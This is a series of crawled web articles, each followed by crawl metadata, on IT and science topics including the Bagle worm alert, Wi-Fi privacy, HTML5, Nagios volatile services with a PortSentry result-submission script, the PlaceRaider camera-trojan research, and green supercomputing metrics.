Bagle, a new Internet Worm, Makes Its Presence Felt 19 Jan 2004 Kaspersky Lab, a leading information security software developer, is warning users about I-Worm.Bagle, a new Internet worm detected in the wild. The worm spreads via email with a random sender address. Kaspersky Lab has received reports of infections from around the world; Bagle is causing a significant outbreak. The worm is a Windows EXE file about 15 KB in size attached to emails with random sender addresses. The subject, 'Hi', body, 'Test =)' and signature 'Test, yep' are constant, whereas the name of the attachment is random. Once the worm is launched, it copies itself into the Windows directory and attempts to download and launch Mitglieder, a Trojan proxy server, on the infected machine. This proxy server allows the 'master' to use the infected machine as a platform to send more copies of the malicious code. Currently, all links to Internet sources for downloading Mitglieder are deleted. Thus, I-Worm.Bagle cannot use this technology to increase propagation speed. As a result, at this time, I-Worm.Bagle is using a technique standard for Trojan programs. Bagle scans the file system on infected machines for files with extensions wab, txt, htm and r1. The worm then sends copies of itself to all email addresses that it uncovers, using a built-in SMTP server. Kaspersky® Anti-Virus databases have already been updated with protection against Bagle.
<urn:uuid:650fa8a2-ee32-4286-ae79-e85888c7eb99>
CC-MAIN-2017-04
http://www.kaspersky.com/au/about/news/virus/2004/Bagle_a_new_Internet_Worm_Makes_Its_Presence_Felt
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00338-ip-10-171-10-70.ec2.internal.warc.gz
en
0.862757
325
2.71875
3
It would be easy to underestimate the importance of a good firewall in protecting your computer when it is connected to the Internet. Studies have found that a computer could be affected by a trojan, worm, or network attack in a matter of a few minutes if it did not have a firewall installed. Windows XP has a built-in firewall that is enabled by default. The Service Pack 1 version of the firewall gave fairly good protection against attack, but the Service Pack 2 version was much improved. If you are running Windows XP you should update your system to Service Pack 2 or, preferably, Service Pack 3 to secure your data. Windows Vista included an updated security model for Internet communication. As new Vista network connections are created (wireless, dialup, VPN), each connection must be classified as a Public, Private or Domain network location. A network location designation changes networking and firewall settings to reflect the possible threats on a network. A network at a public location such as a restaurant, hotel or airport poses the greatest risk and should be designated as a Public network. Windows Vista launches a dialog window whenever a new connection is established and prompts the user to choose a location. Windows Vista allows fine-tuning of network location firewall settings by using the Windows Firewall with Advanced Security snap-in. The Advanced firewall includes inbound and outbound firewall rules that can precisely control what traffic is allowed through the firewall. The rules can apply to one, two or all of the network locations. Windows 7 builds on the firewall capabilities introduced by Windows Vista with new features for the Standard Firewall. The Windows 7 Standard Firewall allows enabling or disabling the firewall and the setting of notifications on a per-location basis. The Standard Firewall also permits the granting of inbound exceptions on individual network locations, a feature previously only available on the Advanced Firewall. Managing the Standard Firewall is easier on Windows 7 than on any previous version of Windows. Windows 7 also includes Internet Explorer 8, which can run in Protected Mode, a phishing filter and User Account Control, making it the safest Windows OS yet.
<urn:uuid:d2f6e159-818c-490f-b5b1-8a8e91e423b9>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2010/02/09/network-locations-and-the-windows-7-firewall/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00154-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907487
416
2.59375
3
Back in 1970, well before the eating of raw fish became so popular among global gourmands, bluefin tuna, the fish that becomes the delectable Maguro sushi and sashimi on our plates, sold for about five cents a pound. Last year, in a Tokyo fish market one bluefin tuna sold for nearly three quarters of a million dollars, or $1,238 per pound, reflecting in dramatic form the worldwide popularity of the fish. In Japan there has been some discussion as to whether the nation's love affair with Maguro is pushing the bluefin tuna to extinction. After all, Japan consumes about 80% of the world's annual bluefin tuna catch. Its imports of the prized fish soared from 340 tons in 1970 to more than 36,000 tons in 2005, on top of the domestic catch of more than 15,000 tons. While the fish is not on the U.S.'s endangered species list, it is widely thought to be massively overfished, through legal and illegal means, and is considered "a species of concern" by the National Oceanic and Atmospheric Administration (NOAA). NOAA does, however, impose quotas on how many bluefin can be caught. By now, you might have guessed that big data is coming to the rescue – and you'd be right. Modeling big data sets about bluefin breeding habits and migration patterns could well save the bluefin population and an epicurean's Maguro. In that effort, scientists and fishing industry experts are mining NOAA's Comprehensive Large Array-data Stewardship System (CLASS). It began in 2005 as a project to "provide one-stop shopping and access" to its myriad of massive environmental data sets. Currently, CLASS stores more than 20 petabytes of information and adds more than 750 gigabytes each week. These data are vital for decision-makers at international governing bodies to dictate if, how, and when changes are made to fishing limits or even bans on bluefin tuna. As the Environmental Group at the Pew Charitable Trust put it: "These assessments use historical catch data, scientific studies, and mathematical models to simulate and track a population as fish are produced, grow, reproduce, and die. They also allow scientists to predict how various management options will affect bluefin tuna in the future." Without big data, our understanding of the bluefin tuna's future would be dim. But with it, we may sustain the species in the ocean while continuing to savor it on our plates.
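For intuition, the kind of assessment Pew describes can be reduced to a loop that ages a population forward one year at a time while applying reproduction, natural death and fishing pressure. The Python sketch below is a deliberately crude illustration with invented parameters, not a real bluefin stock assessment:

# Toy age-structured population projection (all parameters are assumed, illustrative values).
recruits_per_spawner = 0.8   # young fish produced per mature fish each year
natural_mortality = 0.15     # fraction dying of natural causes per year
maturity_age = 4             # age at which fish begin to spawn

def project(population, fishing_mortality, years=20):
    # population: list of counts by age class; returns the total stock after each year.
    totals = []
    for _ in range(years):
        spawners = sum(population[maturity_age:])
        survivors = [n * (1 - natural_mortality) * (1 - fishing_mortality) for n in population]
        population = [recruits_per_spawner * spawners] + survivors[:-1]   # everyone ages a year
        totals.append(sum(population))
    return totals

initial = [1000, 800, 600, 400, 300, 200, 100, 50]   # counts for ages 0 through 7

for f in (0.1, 0.3, 0.5):   # compare three levels of fishing pressure
    print(f"fishing mortality {f:.1f}: stock after 20 years = {project(initial, f)[-1]:.0f}")

Real assessments fit far richer versions of this loop to catch histories, tagging studies and survey data, which is how managers judge whether a proposed quota keeps the spawning stock above a safe threshold.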
<urn:uuid:0c595a1c-9854-4647-80ee-04f996cc46ee>
CC-MAIN-2017-04
http://www.itworld.com/article/2721029/it-management/big-data-may-ensure-sustainable-sushi.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00366-ip-10-171-10-70.ec2.internal.warc.gz
en
0.922196
636
3.34375
3
July 10 — Scientists from the National Renewable Energy Laboratory (NREL) are using the National Science Foundation-supported Stampede supercomputer to improve biofuel production by determining how certain enzymes break down cellulose (plant cell walls). In a paper published in the Proceedings of the National Academy of Sciences in January 2014, they describe a newly-discovered, naturally-occurring enzyme modeled with Stampede that could significantly speed up the process by which cellulose is decomposed. The enzyme, called lytic polysaccharide monooxygenase or LPMO, represents an important, unique discovery because of its prevalence in nature, and its potential importance to cost-effective biomass deconstruction. Using Stampede, the researchers examined two ways that the fungal enzymes catalyze reactions. The simulations suggest that the binding of copper and oxygen by the enzymes is critical to its function. The group is also using Stampede to design chemical catalysts for high-temperature deoxygenation chemistry, which is important to convert biomass to fuels. Said NREL Senior Engineer Gregg Beckham: “Stampede has been an absolutely essential resource for our group to examine biological and chemical catalysts important for the production of renewable transportation fuels from lignocellulosic [plant-based] biomass.”
<urn:uuid:f98eefb2-16d1-4b81-9030-819ab019939b>
CC-MAIN-2017-04
https://www.hpcwire.com/off-the-wire/nrel-researchers-utilizing-nsf-supported-stampede-supercomputer/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00477-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933398
269
3.15625
3
Forwarded from: "eric wolbrom, CISSP" <ericat_private> http://seattletimes.nwsource.com/html/businesstechnology/134462403_btboston2=7.html Monday, May 27, 2002, 12:00 a.m. Pacific By Simson L. Garfinkel Special to The Seattle Times If you have one of those fancy new wireless Wi-Fi or 802.11(b) cards in your laptop or handheld computer, you probably know about the increasing number of "Wi-Fi hot spots" where you can get wireless Internet access - often without paying. What you may not know, experts warn, is that these hot spots can also use your wireless card to track your movements as you walk around. Meanwhile, other people using the same hot spots can covertly monitor all of the information that you send over the air. "Your average person does not know that they are transmitting any sort of serial number or identification code," says Dana Spiegel, a volunteer with NYC Wireless. Yet every wireless card is created with a unique serial number called a "MAC address." This number, which is transmitted constantly whenever the wireless card is in use, can be used to track a person's movements as he or she carries a wireless-equipped laptop or personal digital assistant (PDA) with them throughout a city or within an office. Although there are no reports of businesses or individuals covertly tracking Wi-Fi users by their MAC addresses, Newbury Networks, a Massachusetts company, has developed a product that uses this capability to create a system for tracking users of handheld computers as they walk around museums and businesses. The system triangulates Wi-Fi users using their MAC address and their wireless signal, says Chuck Conley, director of marketing for the company. Museums can use it to display Web pages or maps on a handheld computer as a person moves from exhibit to exhibit. "It's accurate to within three meters," Conley says. The MAC address plays a vital role in wireless networks: Transmitted with every packet of information sent through the air, the MAC address specifies the radio that is sending the packet and the intended recipient. That's important because, unlike a wired network, every packet sent through the air might potentially be received by dozens, even hundreds, of computers. The network uses the MAC address to make sure that information is received only by the intended recipient. But there is nothing in principle that prevents one wireless radio from listening to packets that are intended for another. And this, experts say, is the cause of a second serious privacy concern with wireless networks: It is easy to eavesdrop on other people's communications, especially at open network access points that do not use encryption. "A lot of people are using these for home and business networks without realizing the distance with which the signal can be intercepted," says Avi Rubin, a researcher at AT&T Laboratories who specializes in wireless-security issues. Using special antennas, it is possible to eavesdrop upon a Wi-Fi signal that is originating thousands of feet away. Even without such equipment, Wi-Fi signals can be intercepted by other people in adjacent offices or across the street. Although Wi-Fi equipment on the market includes an encryption system called WEP (short for Wireline Equivalent Privacy), Rubin's research has shown that errors in the way the encryption was implemented cause it to be largely ineffective. Many people "believe that if they turn on the security features that come with it, like the encryption, that they are safe," Rubin says. 
But in fact, most networks using WEP can be cracked in a few hours. What's more, WEP is not used at Wi-Fi "hot spots." If it were, people passing through wouldn't be able to access the networks. In New York, NYC Wireless has tried to tackle the privacy issue by advising people to use their own encryption. For example, Web pages that are downloaded using the https: instead of the http: protocol are safe from eavesdropping because they are encrypted with the SSL protocol. For individual users on a public network, it's best to work under the assumption that the network is completely insecure and perhaps even "hostile," says Spiegel. "That means using only secure channels for your communications, which is something that we always encourage our users to do." Yet another privacy problem with the Wi-Fi system is that sophisticated users can change their MAC addresses using special tools. A person interested in conducting a crime on the Internet could sniff your MAC address when you were at a public Internet cafe and then set a wireless card to use your MAC address after you left. "For the average Joe in the street, the likelihood of him being monitored by another average Joe in the street is not that great," says Richard Powers, editorial director of the Computer Security Institute. But many people who consider themselves to be "average" really aren't because of the information that they have access to through their work. Many people, Powers says, treat the information at work as confidential, but then they will bring it home and access it in a less secure environment. One of the most famous examples of this involves former CIA Director John Deutch, who took classified information out of the CIA and accessed it on an unsecured computer in his Massachusetts home. Deutch's actions were pardoned by President Clinton on the president's last day in office. "Deutch is not a bad guy, all things considered, but he made an incredible blunder," says Powers. Rubin, the AT&T scientist, uses a wireless network in his house, but "I do it knowing that it is available to somebody outside the house. So for very important business transactions, I tunnel through a machine back at work." As for buying things over the Web, he says, "I make sure that I'm using SSL." Simson L. Garfinkel is a technology journalist and author who specializes in computer security and privacy.
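Indoor location systems of the kind described above typically start from received signal strength measured at several access points. As a rough illustration of the physics, the Python snippet below converts signal-strength readings for one observed MAC address into distance estimates with a log-distance path-loss model; the reference power, path-loss exponent, access point names and readings are all assumed values, and real systems calibrate these per site and combine several distances to triangulate a position:

# Log-distance path-loss model: rssi = RSSI_AT_1M - 10 * n * log10(distance)
RSSI_AT_1M = -40.0   # signal strength one meter from the transmitter, in dBm (assumed)
PATH_LOSS_N = 2.7    # path-loss exponent for a cluttered indoor space (assumed)

def estimate_distance(rssi_dbm):
    # Invert the model to get an approximate distance in meters.
    return 10 ** ((RSSI_AT_1M - rssi_dbm) / (10 * PATH_LOSS_N))

# Hypothetical readings of one client's signal as seen by three access points.
readings_dbm = {"AP-lobby": -55, "AP-gallery": -63, "AP-office": -71}

for ap, rssi in readings_dbm.items():
    print(f"{ap}: roughly {estimate_distance(rssi):.1f} m away")

The privacy point of the article follows directly: because the MAC address in each frame ties these readings to one device, whoever operates the access points can keep estimating where that device is.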
<urn:uuid:2ad6fca7-dd95-41b7-9cdd-4f3677728e37>
CC-MAIN-2017-04
http://lists.jammed.com/ISN/2002/06/0001.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00229-ip-10-171-10-70.ec2.internal.warc.gz
en
0.967798
1,272
2.71875
3
HTML 5: What's new about it? Precise elements and application programming interfaces - By Joab Jackson - Aug 28, 2009 HTML 5 will maintain backward compatibility with all former versions, while cleaning up some ambiguities of the previous version of the markup language. It will also offer a number of new elements, or markup symbols, that can more precisely define the elements of a Web page. And for the first time, HTML will come with a set of application programming interfaces (APIs) that assist developers in setting up Web applications. In this report: The long road to HTML 5
Here are some highlights:
- Article and Aside: Elements for marking the main body of text for a page and for additional sidebars of text, respectively.
- Audio and Video: Elements for marking video and audio files. With these elements in place, application authors can write their own interfaces or use a browser's built-in functions for actions such as fast-forwarding or rewinding.
- Canvas: An element that can be used for rendering dynamic bitmap graphics on the fly, such as charts or games.
- Details: An element that could be put in place to allow users to obtain additional information upon demand.
- Dialog: An element that defines written dialog on a Web page.
- Header and Footer: Elements for rendering headers and footers to a Web page.
- Meter: An element that can be used to render some form of measurement.
- Section: This element can be used to define different sections within a Web page.
- Nav: An element for aiding in navigation around a site.
- Progress: An element that can be used to represent completion of a task, such as downloading a file.
- Time: An element to represent a time and/or a date.
- An API for allowing Web applications to run off-line.
- An API for cross-document messaging, which allows two parts of a Web page that come from different sources to communicate information.
- An API for dragging and dropping content across a Web page.
- An API for drawing 2-D images for the canvas tag.
- An API for playing audio and video, used in conjunction with the audio and video tags.
Source: "HTML 5 differences from HTML 4" (http://dev.w3.org/html5/html4-differences/) and HTML 5 Draft (http://dev.w3.org/html5/spec/Overview.html) Joab Jackson is the senior technology editor for Government Computer News.
<urn:uuid:a5d092a2-14b7-49a8-8389-fc882adbda44>
CC-MAIN-2017-04
https://gcn.com/articles/2009/08/31/html-5-sidebar-new-elements.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00531-ip-10-171-10-70.ec2.internal.warc.gz
en
0.823421
531
3.09375
3
Supercomputing vendor SiCortex has long trumpeted the power-, cooling-, and space-friendliness of its HPC gear. Over time it's added those advantages together to create a picture of eco-friendly HPC, and it's reinforced the message in special events where it uses pedal power from teams of bicyclists to power its boxes. This week the company is introducing a new metric, the Green Computing Performance Index, that assesses the performance of individual supercomputers based on the ratio of their performance on the HPC Challenge benchmark to power consumption. Although the broader IT community has whipped itself into a foamy eco-green froth over the past two years, the conversation about the ecological impact of computing is still fairly new in HPC. The only major community effort to assess the impact of supercomputing on the ecosystem thus far has been the Green500 List, which didn't get started until November 2007. The Green500, curated by Wu-chun Feng and Kirk W. Cameron, uses performance figures from the TOP500 List and divides them by the total power draw of the machine. Power is either peak (indicated in gray on the Green500 Web site) or measured according to a methodology described on the Web site. This approach carries with it a significant advantage, namely the TOP500 list itself. The list is well-understood and widely quoted. Most serious HPC organizations submit results to it, and so the Green500 team has been able to build upon the momentum that the TOP500 team has established over many years. However, using the TOP500 List as the performance basis also brings along the disadvantage of that list: it uses a sole performance benchmark, the Linpack, which is often observed to be inadequate to characterize a supercomputer's usefulness on real world problems. The team at SiCortex addressed this shortcoming of the Green500's approach by adopting the benchmark suite that was developed to address the deficiencies of the Linpack itself: the HPC Challenge Benchmark. The HPCC consists of seven tests, each of which stresses various aspects of a machine's architecture, including the same floating point performance measure used on the TOP500 list plus additional tests that measure memory bandwidth and interprocessor communication as well as floating point performance in more complex computational kernels. Results from an HPCC run are divided by the power consumed in kilowatts, again either measured or peak, to yield SiCortex's proposed index, the Green Computing Performance Index or GCPI. John Goodhue, SiCortex's CTO and a member of the team doing the thinking on the GCPI, recognizes that there are a variety of ways that individual consumers might need to see this information, and the metric admits three different ways to compute the GCPI. First, one can compute the GCPI on a benchmark-by-benchmark basis. For example, dividing the performance of the Cray XT4 at the ERDC MSRC on the single STREAM triad metric reported at the HPCC Web site by its power consumption yields 129.4 GB/(s*kW). This approach gives a detail-rich view, with multiple measures that reveal the various dimensions of power efficiency and permit fine-grained analysis of a system's green computing performance. For those who need more of a shorthand, or who only need the overall picture, the measurements can be combined into a single GCPI number for a machine using an average of the GCPIs resulting from a complete HPCC run.
Finally, users may decide to selectively include only the portion of the HPCC that matter most to them, or to weight the components individually, to form a “roll your own” metric to serve a set of highly specialized needs. The flexibility of SiCortex’s approach is valuable because it provides a path to preserve the “one number” convenience of both the TOP500 and the Green500 while preserving more levels of detail for later analysis. SiCortex recognizes that, if the GCPI is to be broadly accepted and used by the community, they cannot be the owners and maintainers of the measure. According to Goodhue, SiCortex is in active discussions with several third parties to own the metric and host its governing body. “At that point,” says Goodhue,”we won’t have anything to do with it other than by participating in the GCPI organization and submitting results for our machines.” Although SiCortex isn’t talking publicly about organizations it is in talks with, one potential partner is The Green Grid. The Green Grid (covered in an HPCwire feature earlier this year) is a relatively new organization focused on improving energy efficiency in datacenters and “business computing ecosystems.” After nearly two years, the organization has over 150 members, including power companies, hardware vendors, and end user organizations. Their strategy is focused on the datacenter as a whole, but when I talked with them earlier this year, they could foresee a time when they might be interested in driving their focus down further. This is still probably a little early for them, but if someone else has done the legwork, it might make sense.
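The arithmetic behind the proposed index is simple enough to sketch. The Python below shows the three variants: per-benchmark ratios, a single combined number, and a user-weighted blend. The benchmark figures, reference values, weights and power number are invented for illustration and are not measurements of any real system; in particular, the normalization step is an assumption made here because the HPCC tests report results in different units:

# Illustrative GCPI-style arithmetic with made-up numbers.
power_kw = 18.0   # measured system power draw in kilowatts (assumed)

hpcc_results = {
    # test name: (score, unit) -- assumed values
    "HPL": (9500.0, "GFLOP/s"),
    "STREAM triad": (2300.0, "GB/s"),
    "RandomAccess": (1.2, "GUP/s"),
}

# 1) Benchmark-by-benchmark index: performance per kilowatt for each test.
for name, (value, unit) in hpcc_results.items():
    print(f"{name:13s} {value / power_kw:8.2f} {unit}/kW")

# 2) One combined number. The tests use different units, so they are first
#    normalized against an arbitrary reference system (assumed values).
reference = {"HPL": 8000.0, "STREAM triad": 2000.0, "RandomAccess": 1.0}
normalized = {n: hpcc_results[n][0] / reference[n] for n in hpcc_results}
combined = sum(normalized.values()) / len(normalized) / power_kw
print(f"combined index (relative units per kW): {combined:.3f}")

# 3) "Roll your own": weight the tests to match a site's workload (weights assumed).
weights = {"HPL": 0.2, "STREAM triad": 0.5, "RandomAccess": 0.3}
custom = sum(weights[n] * normalized[n] for n in weights) / power_kw
print(f"weighted index (relative units per kW): {custom:.3f}")

Whatever the weighting, the denominator matters as much as the numerator: an index built on measured rather than peak power rewards machines that are efficient as actually operated.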
<urn:uuid:b05b86c0-f705-4605-a7d4-f1a8b874e176>
CC-MAIN-2017-04
https://www.hpcwire.com/2008/11/06/mine_is_greener_than_yours/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00531-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948159
1,090
2.515625
3
Tremors generate tweets in new USGS earthquake program The Twitter Earthquake Detector could spread the word before official alerts - By Dan Campbell - Dec 21, 2009 The U.S. Geological Survey is testing the use of Twitter as a means to quickly collect and disseminate earthquake-related information. The popular social networking Web site and blogging tool is being used as a means to gather firsthand accounts of seismic events as they unfold. Funded by the American Recovery and Reinvestment Act, the Twitter Earthquake Detector (TED) program is an "exploratory effort" intended to gather real-time earthquake-related messages, according to USGS. The idea is to have people who actually feel a tremor or observe its effects tweet their observations. The TED system applies location, time and keyword filtering to track accounts of tremors. The system allows for first impressions and even photos of the event to be delivered to the public from within or near the quake's epicenter prior to any official report. "Many people use Twitter, so after an earthquake, they often rapidly report that an earthquake has occurred and describe what they've experienced," said Paul Earle, a USGS seismologist. "Twitter reports often precede the USGS's publicly released, scientifically verified earthquake alerts." TED monitors Twitter for tweets that contain the word "earthquake" in all languages. The system also queries Twitter after USGS or another contributing network to the Advanced National Seismic System detects an earthquake, Earle said. The TED program is intended to augment rather than replace other USGS earthquake projects that rapidly detect and report earthquake locations and magnitudes in the United States and globally. Tweets typically provide the initial information to the public faster than official scientific alerts, which can take between two and 20 minutes, depending on the location of the event. The program has great potential, particularly in areas where seismic instrumentation is sparse, USGS said. "In densely instrumented regions, like California, locations and magnitudes are produced within two to three minutes of an event," said Michelle Guy, a USGS scientist and software developer. But the "time increases up to 20 minutes in sparsely instrumented regions." "Analyzing the tweets provides an early indication of what people experience before the quantitative information" is analyzed and delivered, Guy said. However, USGS, which publishes the location and magnitude of about 50 earthquakes a day, cautioned that tweets should be viewed as a preview and supplement to the official report. Twitter-based accounts are admittedly anecdotal and could even prove to be false positives. "The basic difference is speed versus accuracy," Guy said. The tweets are subsequently attached to the official earthquake alert and report with a summary of the cities and an interactive map showing their origin. The tweets are open to the public to search and analyze. The program may be reviewed at twitter.com/USGSted as well as www.USGS.gov/socialmedia. Earle said people are integral to the success of the TED program. "Without their tweets, we would have no system," he said. Dan Campbell is a freelance writer with Government Computer News and the president of Millennia Systems Inc.
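Conceptually, the detector's first pass is little more than a keyword, time and location filter over a stream of messages. The Python function below illustrates that filtering step on a small hand-made list of tweets; it is not USGS code, and the field names, keywords and thresholds are assumptions made up for the example:

from datetime import datetime, timedelta
from math import radians, sin, cos, asin, sqrt

KEYWORDS = ("earthquake", "terremoto", "sismo")   # assumed multilingual keyword list

def distance_km(lat1, lon1, lat2, lon2):
    # Great-circle (haversine) distance between two points, in kilometers.
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(a))

def candidate_reports(tweets, event_time, epicenter, window_minutes=10, radius_km=300):
    # Keep tweets that mention a keyword, arrive shortly after the event, and come from nearby.
    keep = []
    for t in tweets:
        text_ok = any(k in t["text"].lower() for k in KEYWORDS)
        time_ok = timedelta(0) <= t["time"] - event_time <= timedelta(minutes=window_minutes)
        near_ok = distance_km(*t["latlon"], *epicenter) <= radius_km
        if text_ok and time_ok and near_ok:
            keep.append(t)
    return keep

event = datetime(2009, 12, 1, 10, 0, 0)
sample = [
    {"text": "Whoa, earthquake just shook the office!", "time": event + timedelta(minutes=2), "latlon": (37.77, -122.42)},
    {"text": "Nice weather today", "time": event + timedelta(minutes=3), "latlon": (37.80, -122.27)},
]
print(len(candidate_reports(sample, event, epicenter=(37.7, -122.4))), "candidate report(s)")

The hard part in practice is everything after this filter: weeding out jokes and retweets, and presenting the surviving messages as a preview rather than a verified measurement.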
<urn:uuid:cd59eeb1-3e0f-48ca-966c-298fc2906825>
CC-MAIN-2017-04
https://gcn.com/articles/2009/12/21/usgs-earthquake-twitter-tweets.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00441-ip-10-171-10-70.ec2.internal.warc.gz
en
0.941817
687
2.671875
3
See Also: State Stalking
Nagios has the ability to distinguish between "normal" services and "volatile" services. The is_volatile option in each service definition allows you to specify whether a specific service is volatile or not. For most people, the majority of all monitored services will be non-volatile (i.e. "normal"). However, volatile services can be very useful when used properly...
What Are They Useful For?
Volatile services are useful for monitoring...
What's So Special About Volatile Services?
Volatile services differ from "normal" services in three important ways. Each time they are checked when they are in a hard non-OK state, and the check returns a non-OK state (i.e. no state change has occurred)...
These events normally only occur for services when they are in a non-OK state and a hard state change has just occurred. In other words, they only happen the first time that a service goes into a non-OK state. If future checks of the service result in the same non-OK state, no hard state change occurs and none of the events mentioned take place again.
Tip: If you are only interested in logging, consider using stalking options instead.
The Power Of Two
If you combine the features of volatile services and passive service checks, you can do some very useful things. Examples of this include handling SNMP traps, security alerts, etc. How about an example... Let's say you're running PortSentry to detect port scans on your machine and automatically firewall potential intruders. If you want to let Nagios know about port scans, you could do the following...
Edit your PortSentry configuration file (portsentry.conf) and define a command for the KILL_RUN_CMD directive as follows:
KILL_RUN_CMD="/usr/local/Nagios/libexec/eventhandlers/submit_check_result host_name 'Port Scans' 2 'Port scan from host $TARGET$ on port $PORT$. Host has been firewalled.'"
Make sure to replace host_name with the short name of the host that the service is associated with.
Port Scan Script: Create a shell script in the /usr/local/nagios/libexec/eventhandlers directory named submit_check_result. The contents of the shell script should be something similar to the following...
#!/bin/sh
# Write a command to the Nagios command file to cause
# it to process a service check result
echocmd="/bin/echo"
CommandFile="/usr/local/nagios/var/rw/nagios.cmd"
# get the current date/time in seconds since UNIX epoch
datetime=`date +%s`
# create the command line to add to the command file
cmdline="[$datetime] PROCESS_SERVICE_CHECK_RESULT;$1;$2;$3;$4"
# append the command to the end of the command file
$echocmd "$cmdline" >> $CommandFile
What will happen when PortSentry detects a port scan on the machine in the future? Pretty neat, huh?
<urn:uuid:1624a238-3a20-4c53-82a7-1d2451e7f7e7>
CC-MAIN-2017-04
https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/volatileservices.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00257-ip-10-171-10-70.ec2.internal.warc.gz
en
0.86387
682
2.59375
3
The rise of mobile malware in the last few years has been well documented, and the latest reports show that malware sending out text messages to premium rate numbers is the type users encounter most often. This prevalence will likely not be challenged for a while – after all, there are not many crooks who would say no to a fast and easy buck – but users must be aware that new malicious software with as yet unimaginable capabilities will surface in time. One of these malicious programs has recently been unearthed, but luckily for all of us the Trojan posing as a camera app is currently only a prototype created by a team of researchers from the Naval Surface Warfare Center in Indiana and Indiana University. The name of the malware in question is PlaceRaider, and its goal is to surreptitiously take photos with Android smartphones' built-in camera in order for attackers to be able to recreate a 3D model of the user's indoor environment and steal all kinds of information. "Once the visual data has been transferred and reconstructed into a 3D model, the remote attacker can surveil the target's private home or work space, and engage in virtual theft by exploring, viewing, and stealing the contents of visible objects including sensitive documents, personal photographs, and computer monitors," the researchers explained in a recently released paper. They tested their Trojan on 20 individuals by giving them infected devices. As they went through their day, the malware would take hundreds of photos (along with orientation and acceleration sensor data) and, after filtering out the uninformative ones, would send the remaining ones to the researchers' remote server. The victims were oblivious to the Trojan's activities, as the malware is designed to mute the sound of the camera's shutter. With the images in hand, the researchers then used a computer vision algorithm to generate a rich 3D model, which can be inspected very closely for valuable information. The PoC Trojan has been designed for the Android platform, and the scary part is that the permissions it asks for – to access the camera, to write to external storage, to connect to the network, to change audio settings – can easily be seen as legitimate when the malware is packaged within an attractive camera app. The researchers have proved that it is highly likely that successful "visual" Trojans such as this one will eventually find their way into the wild, so in order to prevent users from becoming targets they advise them to get apps only from trusted software developers. Among other things, hardware manufacturers are advised to implement a shutter sound that can't be muted, and possibly even to make the taking of photos possible only when a physical button is pressed; and Google and Apple (developers of Android and iOS) are urged to make apps also ask permission to collect acceleration and gyroscope data.
<urn:uuid:a205532b-4621-4607-a2cf-9734a5904ed4>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2012/10/01/visual-android-trojan-as-virtual-theft-aid/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00559-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951345
592
2.53125
3
In a knowledge-based economy, information is key. Technology can act as a catalyst to education. E-learning/distance learning can bring education, information, and technical skills to the most remote parts of a country or indeed the world. In order to adequately capture the benefits of information technology, we must improve educational standards. This usually includes basic education reforms, improving math and science skills, and encouraging schools and libraries to go online. Jobs will go where the best trained workforce is. Poor educational skills and illiteracy cost business daily through miscalculations, misspellings, or poor comprehension. Industry needs highly educated individuals to drive the growth and productivity. Technology can help lower costs of providing education or provide more effective education through use of technology. Companies like Cisco increasingly are turning to computer and interactive classes to train their own employees. In the United States, in 2001 the "No Child Left Behind Act" was enacted to help reenergize the US educational system. The law is intended to promote the next stage of raising standards in American education by helping teachers, schools and school districts use challenging standards to guide classroom instruction and student assessment. Technology companies are encouraging the US Congress to ensure adequate funding continues to be available for programs like these. Creative programs such as the Schools and Libraries (E-Rate) program was authorized by the Telecommunications Act of 1996 to provide discounts for connecting schools and libraries to the Internet. Similar initiatives have come from the states. For example, in California, in his first year, Governor Gray Davis called a special session of the legislature which passed four bills now known as READ (Raising Expectations, Achievements and Development). Globally, education is recognized as a key factor in building, maintaining, and leveraging electronic commerce. And, technology is often identified as a means to improve education. The World Economic Forum's (WEF) 2001-2002 "Global Information Technology Report: Readiness for the Networked World" specifically examines the category of "networked learning" to help grade a country's e-commerce preparedness. Among the categories examined are corporate investment in employees IT skills (top three countries are the US, Finland, and Germany), quality of IT training and educational programs (Finland, Netherlands, and Sweden), Internet access in schools (Finland, Canada, and Singapore). Other countries are moving to address the issue of education. For example, Mexico has developed a series of targeted educational initiatives. Mexico's most recent initiative "e-Educacion", will focus on using information technology to educate millions of Mexicans who never had the opportunity to finish primary or secondary school. Similarly, Thailand's "National IT-2000 Plan" envisages improving education in Thailand through the use of technology. Likewise, France identified education as one of six key areas of targeted information communications and technology development under the PAGSI (prepare the entry of France into the Information Society) plan. As stated by John Chambers, CEO and President of Cisco, "Education is the great equalizer in life. In order to properly prepare our children for the jobs of the 21st Century, we need fundamental changes in our education system. 
